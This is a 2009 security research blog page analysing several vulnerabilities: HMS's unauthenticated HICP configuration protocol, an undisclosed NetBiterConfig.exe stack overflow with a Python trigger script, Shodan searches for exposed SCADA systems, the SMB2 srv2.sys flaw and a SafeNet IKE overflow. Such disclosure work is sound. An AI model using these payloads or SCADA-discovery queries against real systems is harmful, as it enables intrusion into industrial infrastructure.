Reverse Mode - Home

Reversemode

Home

Monday, 08 February 2010

CONTENT

Corporate Website

BYTES & WORDS

Latest News
Exposing HMS HICP Protocol + 0Day 'light' + SCADA_SHODAN Regarding SMB2.0 Negotiate BSOD published by Laurent Gaffié Safenet is not so safe... Exploiting Novell/Netidentity Agent Remote Arbitrary Pointer Dereference. BlackLeaf released Exploiting kaspersky klim5.sys driver + Happy pack #2

Exposing HMS HICP Protocol + 0Day 'light' + SCADA_SHODAN

Written by Rubén
Monday, 14 December 2009
I'll be conducting a Reverse Engineering Training (8 hours = 1 day) within the context of the RootedCON Security Conference on March 15, 2010. RootedCON 2010 will take place at the Auditorium inside the "Centro de Convenciones Mapfre", in Madrid, Spain (Europe :P), on March 18 - 20, 2010. More info: http://www.rootedcon.es Reversemode 2.0 hehe, http://www.twitter.com/reversemode Hi all, After a long period of inactivity I'm back with fresh content. Today we are going to reverse a simple M2M propietary protocol developed by the swedish company HMS.In addition to this, a related 0day will be disclosed and finally, we'll learn to find out SCADA systems with the help of the new toy: SHODAN 1st PART "HMS HICP Protocol" AFAIK there is no public documentation about this protocol, if not so please let me know and I'll repeatedly hit myself with a sharpened stick.All the information presented here has been obviously obtained by reverse engineering. Despite of the fact that this protocol is not complex,I think it has a potential interest regarding SCADA security.You'll see why. HICP, is intented to configure HMS's products that include ethernet/ capabilities, since they need a method for configuring Internal IP,DCHP,NetworkMask,DNS,gateway.... In 2004 HMS released a free tool named "Anybus IPconfig" which can be used to scan a network where the devices are connected, then proceeding to configure them. The components of this application are a simple MFC based GUI and a dll (hicp.dll). So let's take a look at the exports: Code (asm) .text:100027AF ; int __cdecl HICP_SendModuleScan() .text:100027AF public ?HICP_SendModuleScan@@YAHXZ .text:100027AF ?HICP_SendModuleScan@@YAHXZ proc near .text:100027AF push ebp .text:100027B0 mov ebp, esp .text:100027B2 call sub_10002175 .text:100027B7 pop ebp .text:100027B8 retn .text:100027B8 ?HICP_SendModuleScan@@YAHXZ endp In C Code (c) sprintf(&Dest, "Module Scan"); to.sa_family = AF_INET; (_WORD )&to.sa_data[0] = htons(HICP_PORT); // 3250 UDP (_DWORD )&to.sa_data[2] = htonl(IP_BROADCAST); v1 = strlen(&Dest); if ( sendto(s, &Dest, v1 + 1, 0, &to, 16) != -1 ) So we can see that in order to scan the network, this tool sends a broadcast UDP packet containing the string "Module Scan" to the HICP port (3250). Inside HMS-AnyBus based devices we can find a hicp daemon listening on port 3250. Once the device receives that packet it broadcasts a reply, which contains its current configuration, to the network on port 3250. The configure Tool listens on this port as well. Let's see what parameters can be configured via this protocol. Any value after the '=' can be modified. +“Protocol version = 1.10; ” # Obvious +”fb type = EVIL-DEVICE; ” # Device Type +”module version = 0.66.6; ” # ... +”mac = 00-30-11-00-CA-FE; ” # MAC +”ip = 192.168.1.252; ” # ... +”sn = 255.255.255.0; ” # Network Mask +”gw = 192.168.1.1; ” # Gateway +”dhcp = off; ” # whether the device is using a DHCP server for obtaining the IP address. (on/off) +”pswd = off; ” # whether the device is using a PASSWORD(on/off) +”hn = morroBufalo; ” # hostname (optional) +”dns1 = 192.168.1.33; ” # Primary DNS +”dns2 = 192.168.1.34; ” # Secondary DNS (optional) +”password = admin; ” # old password (if any, admin by default) +”new password = fatbird; ” # new password These parameters are sent via UDP in plain text, concatenating each one and separated by a ";". If you want to configure a device, you need to prepend a "Configure:" string in this way: "Configure: xx-xx-xx-xx-xx-xx;"+ parameters_string. Where xx-xx-xx-xx-xx-xx is the MAC of the device you want to configure. You can take a look at HICP_SendConfigure code to verity it. This request is broadcasted so is received by any device/machine in the network listening on 3250/UDP. The device checks the MAC against it own and if matches then proceeds to update its internal registers.The first three bytes of the MAC are always 00-30-11 which correspond to the HMS' oui as expected. In addition to this request, there are a couple of additional replyes implemented: + "Invalid Password:" to indicate a failed configuration attempt + "Reconfigured:" to indicate success. That's all. Make your own conclusions about the security level of this protocol.I'm just presenting facts. 2nd Part "Intellicom NetBiterConfing.exe Remote Stack Overwrite". Oday Light. Another swedish company this time, Intellicom develops a serie of SCADA products/devices named NetBiter WebSCADA which are based on HMS AnyBus RemoteCOM device. We can download the firmware, as well as two tools to configure and update these devices respectively.Free goods are always nice. First off, taking a look at the GUI of the tool for configuring devices, NetBiterConfig.exe, we can see that looks pretty similar to the HMS one.Except for a couple of added buttons, one to "wink" a device and the other is to start an "emergency" DHCP server, the tools contains the same components: hicp.dll and a MFC GUI. However, this one contains a surprise. Ok, NetBiterConfig.exe is listening on 3250/UDP receiving packets for any interface, so we can send a specially crafted UDP packet from outside the network to trick the tool into thinking we are a NetBiter device. If we fill "hn" parameter (HostName) with more than 0x20 bytes, we can start to overwrite data in the stack. By constructing a hostname of 0x60 bytes we can overwrite a pointer to an vtable of applications' subclassing methods, this can be used to achieve code execution by emulating a vtable under our control. 0x60 is not an arbitrary value, it allows us to get %esi pointing to the last 0x20 (approximately) bytes of our shellcode. The flaw is triggered when the admin double-clicks in the list box item. The flaw is a classic strcpy without proper bounds checking in NetBiterConfig.exe Code (asm) .text:00403E52 lea edx, [ebp-0ABh] .text:00403E58 push edx ; evil hostname .text:00403E59 lea eax, [ebp-3CCh] .text:00403E5F push eax .text:00403E60 call strcpy The flaw does not exist in AnybusIpconfig.exe since it uses "strncpy": Code (asm) .text:00403691 push 80h .text:00403696 lea eax, [esp+0E1h] .text:0040369D push eax .text:0040369E lea ecx, [esp+494h] .text:004036A5 push 80h .text:004036AA push ecx .text:004036AB mov byte ptr [esp+530h], 1 .text:004036B3 call sub_425666 …. …. .text:004256D9 mov cl, [edx] .text:004256DB mov [eax], cl .text:004256DD inc eax .text:004256DE inc edx .text:004256DF cmp cl, bl .text:004256E1 jz short loc_4256EB .text:004256E3 dec edi .text:004256E4 jz short loc_4256EB .text:004256E6 dec [ebp+arg_C] .text:004256E9 jnz short loc_4256D9 I have not contacted the vendor because I don't feel like it. I am tired of having to elaborate a high technical issue to a customer support agent who will be thinking for sure "WTF?!?". I've got a new ethic rule: "No explicit security contact publicily available + no money involved (I'm used to eat almost three times a day) == 0day". PoC Code (python) #!/usr/bin/python # Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite. # Ruben Santamarta - www.reversemode.com # For research purposes ONLY. # If you use this code to cause damage I’ll cut you open like a f**ing pig. import sys import socket s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.connect(("10.10.10.10",3250)) s.send("protocol version = 1.10; " +"fb type = EVIL-DEVICE; " +"module version = 0.66.6; " +"mac = 00-30-11-00-BA-CA; " +"ip = 192.168.1.52; " +"sn = 255.255.255.0; " +"gw = 192.168.1.1; " +"dhcp = off; " +"pswd = off; " +"hn = "+"A"0×60+"; " +"dns1 = 192.168.1.33;") Another interesting thing is that you can download the firmware for free. The firmware is a .bin file that is comprised of a 0x5F bytes header, which includes a magic 'NBU'+MajorMinorVersion+ImageSize+Checksum+VersionString, followed by a simple gz file so if we cut off the header we can decompress the remaining gz file. Cool. The firmware is a custom linux for MotorolaColdFire processor. It contains interesting stuff like hardcoded passwords... 3rd PART SHODAN is in da house. This means...SCADA systems. Watch out!, don't mess with this type of systems if you don't know what you are really doing. I am not responsible in any manner of any damage you can cause. Fuji Electric Embedded Web Server: http://shodan.surtri.com/?q=fuji+electric Ouman embedded Web Server for SCADA + NetBiter WebSCADA http://shodan.surtri.com/?q=webscada eWon http://shodan.surtri.com/?q=ewon Boa Web Server http://shodan.surtri.com/?q=boa EIG Embedded Web Server http://shodan.surtri.com/?q=EIG EnergyICT http://shodan.surtri.com/?q=energyICT Z-World Rabbit http://shodan.surtri.com/?q=Z-World+Rabbit Niagara Framework http://shodan.surtri.com/?q=Niagara HMS http://shodan.surtri.com/?q=HMS
Last Updated ( Monday, 14 December 2009 )

Regarding SMB2.0 Negotiate BSOD published by Laurent Gaffié

Written by Rubén
Tuesday, 08 September 2009
Today I wake up with an advisory published by Laurent Gaffié where a possible BSOD is announced. The advisory does not provide any technical detail and it is only based on empirical results so it needs to be verified. This is the result of my brief research. Change DoS to Remote Code Execution and Local Privilege Escalation. Why? Module: srv2.sys Code (asm) ; int __stdcall Smb2ValidateProviderCallback(PVOID DestinationBuffer) _Smb2ValidateProviderCallback@4 proc near … … .text:000156B3 loc_156B3: ; CODE XREF: Smb2ValidateProviderCallback(x)+4D5j .text:000156B3 ; Smb2ValidateProviderCallback(x)+4DEj .text:000156B3 movzx eax, word ptr [esi+0Ch]; packet->SBM_Header->Process_ID_High .text:000156B7 mov eax, _ValidateRoutines[eax4]; BUG - out-of-bounds dereference. .text:000156BE test eax, eax .text:000156C0 jnz short loc_156C9 .text:000156C2 mov eax, 0C0000002h .text:000156C7 jmp short loc_156CC .text:000156C9 ; ————————————————————————— .text:000156C9 .text:000156C9 loc_156C9: ; CODE XREF: Smb2ValidateProviderCallback(x)+4F3j .text:000156C9 push ebx .text:000156CA call eax ; Smb2ValidateNegotiate(x) ; Smb2ValidateNegotiate(x) - KABOOOM!! As you can see,[ ESI+0xC ] points to our packet, exactly to the ProcessIDHigh header field whose size is 16 bits. We can fully control this value. Later on this value is used as index to a Function Pointer within the function table _ValidateRoutines. Classic Bug, an out-of-bounds dereference since the code is not checking the size of the table before dereferencing the function pointer. This is the reason why this vulnerability is a Remote Code Execution and not only a DoS. And this is the reason why the exploit provided may or may not crash a machine. If the page pointed by the index is invalid the system will BSOD otherwise it might crash on another point or simply not to crash. How to exploit it?* We see that ESI points to our packet, in addition this function table is located at .data which is located before .PAGE addresses so we can dereference a pointer in that area as well. We "only" need to find a suitable pointer to control the execution. Vulnerable systems: Vista, 7 RC and < 2008 Server R2 according to Microsoft. Keep tuned, I'll post any further development regarding this issue. More info on the blog (castilian) where I collaborate: http://blog.48bits.com
Last Updated ( Wednesday, 09 September 2009 )

Safenet is not so safe...

Written by Rubén
Tuesday, 02 June 2009
Hi! Time to VPN Clients...Reversemode proudly presents "Safenet SoftRemote IKE ireIke.exe service Remote Stack Overflow (Pre-Auth) " ZDI Advisory Safenet SoftRemote Overview http://www.safenet-inc.com/softremote/ SoftRemote is an award-winning VPN client platform for desktop and mobile devices that delivers robust security, ease of use, and powerful policy management features. With an installed base of millions of users, SoftRemote has become the de-facto standard for VPN client software worldwide. Leading VPN vendors use the SoftRemote's OEM version within their custom solutions. Some of these products are: ● Juniper NetScreen Remote ● NetGear Prosafe VPN client ● WatchGuard Mobile User VPN Client Thus, the vulnerability affects every “SoftRemote powered” product. Preface In this document we use Juniper NetScreen Remote as “scapegoat” to demonstrate the vulnerability since it is bundled with the vulnerable version of Safenet's SoftRemote OEM version. This fact does not mean that Juniper NetScreen Remote is the only product affected. As it was explained before, every product powered by Safenet's SoftRemote is vulnerable. Technical Details ireIke.exe service is prone to a remote stack overflow. Malicious attackers can anonymously exploit this flaw by sending a specially crafted UDP packet to the port 62514. Successful exploitation grants SYSTEM privileges to the attacker. ireIke.exe service binds several ports for internal usage, this process can be traced by debugging the following function: Module: ireIke.exe .text:0043C8E0 sub_43C8E0 proc near ; CODE XREF: sub_41A8B0+295#p .text:0043C8E0 ; sub_437F00+442#p ... .text:0043C8E0 .text:0043C8E0 WSAData = WSAData ptr -190h .text:0043C8E0 arg_0 = dword ptr 4 [...] .text:0043CAF4 loc_43CAF4: ; CODE XREF: sub_43C8E0+1ED#j .text:0043CAF4 ; sub_43C8E0+208#j .text:0043CAF4 mov eax, dword_46F2BC .text:0043CAF9 push eax ; int .text:0043CAFA push 0F432h ; 62514 – IPC socket .text:0043CAFF push 11h ; int .text:0043CB01 push 2 ; af .text:0043CB03 call sub_43B850 ; binds .text:0043CB08 add esp, 10h .text:0043CB0B cmp eax, edi .text:0043CB0D mov dword_46F280, eax .text:0043CB12 jnz short loc_43CB34 .text:0043CB14 test byte_45ED58, bl .text:0043CB1A jz short loc_43CB34 .text:0043CB1C push offset SourceName ; "IreIKE" .text:0043CB21 push offset aSUnableToBin_1 ; "%s: Unable to bind IPC socket!" .text:0043CB26 mov dword_479FF8, ebx .text:0043CB2C call sub_437020 .text:0043CB31 add esp, 8 ireIKE.exe after receiving the packet, uses the fifith byte as a “command”. .text:00449E19 movsx eax, byte ptr [ebx+4] ; fifth byte .text:00449E1D add eax, 0FFFFFFD8h ; command - 0x28 .text:00449E20 mov [esp+3F4h+var_3DC], ebp .text:00449E24 cmp eax, 19h ; switch 26 cases 'commands' .text:00449E27 ja loc_44AB78 ; default .text:00449E27 ; jumptable 00449E35 cases 7,9,10,14,16-18,20-24 .text:00449E2D xor edx, edx .text:00449E2F mov dl, ds:byte_44ABE4[eax] .text:00449E35 jmp ds:off_44ABA8[edx*4] ; switch jump
Last Updated ( Tuesday, 02 June 2009 )
Read more...

More...

Exploiting Novell/Netidentity Agent Remote Arbitrary Pointer Dereference.

<< Start < Prev 1 2 3 4 5 6 7 8 9 10 Next > End >>

Results 1 - 4 of 49